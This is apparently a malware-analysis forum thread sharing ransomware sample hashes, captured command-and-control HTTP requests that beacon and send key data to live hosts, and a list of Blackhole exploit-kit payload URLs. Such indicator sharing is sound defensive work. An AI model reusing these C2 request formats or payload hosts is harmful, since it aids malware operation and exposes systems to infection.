[thisisu]

MD5: c36c46f4de045ef332decc006694db6e
https://www.virustotal.com/file/4869d9a ... /analysis/ - I made a blog post here
Many thanks to Blitskrieg @ Kaspersky for creating the excellent decrypting tool. :)

[Xylitol]

Code: Select all

GET /all/dg797FDFddd.php?id=8065D52C494C59584F54&cmd=img HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: dom1ver.4hourspill.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK

---

GET /all/dg797FDFddd.php?id=8065D52C494C59584F54&cmd=geo HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: dom1ver.4hourspill.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK

---

GET /all/dg797FDFddd.php?id=8065D52C494C59584F54&cmd=lfk&data=E0pNkdbKItWRDUbygAZKv9QKVlrG HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: dom1ver.4hourspill.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK

---

GET /all/dg797FDFddd.php?id=8065D52C494C59584F54&stat=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: dom1ver.4hourspill.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK

Code: Select all

http://dom1ver.4hourspill.com/it/dg797FDFddd.php
http://dom1ver.4hourspill.com/fr/dg797FDFddd.php
http://dom1ver.4hourspill.com/es/dg797FDFddd.php
http://dom1ver.4hourspill.com/ca/dg797FDFddd.php
http://dom1ver.4hourspill.com/cn/dg797FDFddd.php
http://dom1ver.4hourspill.com/gr/dg797FDFddd.php
http://dom1ver.4hourspill.com/all/dg797FDFddd.php
Bhole:
http://dom1ver.4hourspill.com/bhstat.php?threadID=22&ruleID=33&key=0c382c13dbaca1490c207a89b61a2c53
http://dom1ver.4hourspill.com/bhadmin.php
http://dom1ver.4hourspill.com/data/1x1.gif
http://dom1ver.4hourspill.com/data/Klot.jar
http://dom1ver.4hourspill.com/data/Pol.jar
http://dom1ver.4hourspill.com/data/Qai.jar
http://dom1ver.4hourspill.com/data/ap1.php
http://dom1ver.4hourspill.com/data/ap2.php
http://dom1ver.4hourspill.com/data/field.swf
http://dom1ver.4hourspill.com/data/hcp_asx.php
http://dom1ver.4hourspill.com/data/hcp_vbs.php
http://dom1ver.4hourspill.com/data/hhcp.php
http://dom1ver.4hourspill.com/data/score.swf

[Xylitol]

Another sample, targeting German ppl.
https://www.virustotal.com/file/7d9fc49 ... /analysis/

Code: Select all

GET /a.php?id=8065D52C494C59584F54&stat=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: horad-forum.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK

---

GET /a.php?id=8065D52C494C59584F54&cmd=key&data=1:0:MTIzNDU2Nzg5MDEyMzQ1Ng== HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: horad-forum.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK

---

GET /a.php?id=8065D52C494C59584F54&stat=240 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: horad-forum.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK

---

GET /a.php?id=8065D52C494C59584F54&cmd=key&data=1:1:MTIzNDU2Nzg5MDEyMzQ1 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: horad-forum.com
Connection: Keep-Alive
Cache-Control: no-cache

HTTP/1.1 200 OK